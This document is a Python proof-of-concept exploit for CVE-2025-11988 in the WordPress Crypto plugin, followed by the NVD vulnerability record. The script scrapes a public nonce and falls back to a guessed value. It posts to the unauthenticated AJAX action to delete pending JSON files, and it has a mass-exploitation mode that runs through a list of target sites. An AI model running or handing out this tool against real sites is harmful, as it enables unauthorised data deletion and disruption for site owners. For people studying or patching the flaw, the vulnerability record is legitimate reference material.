CVE-2025-11988

#!/usr/bin/env python3 """ CVE-2025-11988 PoC - WordPress Crypto Plugin Unauthorized File Deletion Author: Security Researcher Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-11988 """ import requests import re import argparse from urllib.parse import urljoin def get_wordpress_nonce(target_url): """ Extract public nonce from WordPress page source """ try: response = requests.get(target_url, timeout=10) # Try to find nonce in common locations nonce_patterns = [ r'nonce[:\s]+["\']([a-zA-Z0-9]+)["\']', r'_wpnonce[:\s]+["\']([a-zA-Z0-9]+)["\']', r'crypto.*nonce["\':\s]+([a-zA-Z0-9]+)', ] for pattern in nonce_patterns: match = re.search(pattern, response.text, re.IGNORECASE) if match: return match.group(1) return None except requests.RequestException: return None def exploit_crypto_plugin(target_url, file_to_delete): """ Exploit the unauthenticated AJAX endpoint to delete JSON files @param target_url: Base URL of the WordPress site @param file_to_delete: File path relative to wp-content/uploads/yak/ """ # Get nonce from the site nonce = get_wordpress_nonce(target_url) if not nonce: print("[-] Failed to obtain nonce, attempting with common nonce value...") nonce = '1' # Fallback - some implementations accept this # Construct AJAX endpoint ajax_url = urljoin(target_url, 'wp-admin/admin-ajax.php') # Prepare the exploit payload data = { 'action': 'crypto_connect_ajax_process', 'method': 'crypto_delete_json', 'nonce': nonce, 'file': file_to_delete } print(f"[*] Target: {target_url}") print(f"[*] AJAX Endpoint: {ajax_url}") print(f"[*] Using nonce: {nonce}") print(f"[*] Attempting to delete: {file_to_delete}") try: response = requests.post(ajax_url, data=data, timeout=10) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Body: {response.text[:500]}") if 'success' in response.text.lower() or response.status_code == 200: print("[+] File deletion request sent successfully") return True else: print("[-] Exploitation may have failed") return False except requests.RequestException as e: print(f"[-] Request failed: {e}") return False def mass_exploit(target_urls_file, file_pattern='*_pending.json'): """ Mass exploitation against multiple targets """ try: with open(target_urls_file, 'r') as f: urls = [line.strip() for line in f if line.strip()] for url in urls: print(f"\n{'='*60}") exploit_crypto_plugin(url, file_pattern) except FileNotFoundError: print(f"[-] File not found: {target_urls_file}") if __name__ == '__main__': parser = argparse.ArgumentParser(description='CVE-2025-11988 Exploitation Tool') parser.add_argument('-u', '--url', help='Target WordPress URL') parser.add_argument('-f', '--file', default='transaction_pending.json', help='File to delete (relative to wp-content/uploads/yak/)') parser.add_argument('-m', '--mass', help='File containing list of target URLs') args = parser.parse_args() if args.mass: mass_exploit(args.mass) elif args.url: exploit_crypto_plugin(args.url, args.file) else: parser.print_help()

{"cve": {"id": "CVE-2025-11988", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:44.967", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Crypto plugin for WordPress is vulnerable to unauthorized manipulation of data in all versions up to, and including, 2.22. This is due to the plugin registering an unauthenticated AJAX action (wp_ajax_nopriv_crypto_connect_ajax_process) that allows calling the crypto_delete_json method with only a publicly-available nonce check. This makes it possible for unauthenticated attackers to delete specific JSON files matching the pattern *_pending.json within the wp-content/uploads/yak/ directory, causing data loss and denial of service for plugin workflows that rely on these artifacts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto_connect_ajax_register.php#L137", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto_connect_ajax_register.php#L9", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3281d6eb-9f14-43d4-a4d4-532993039e53?source=cve", "source": "[email protected]"}]}}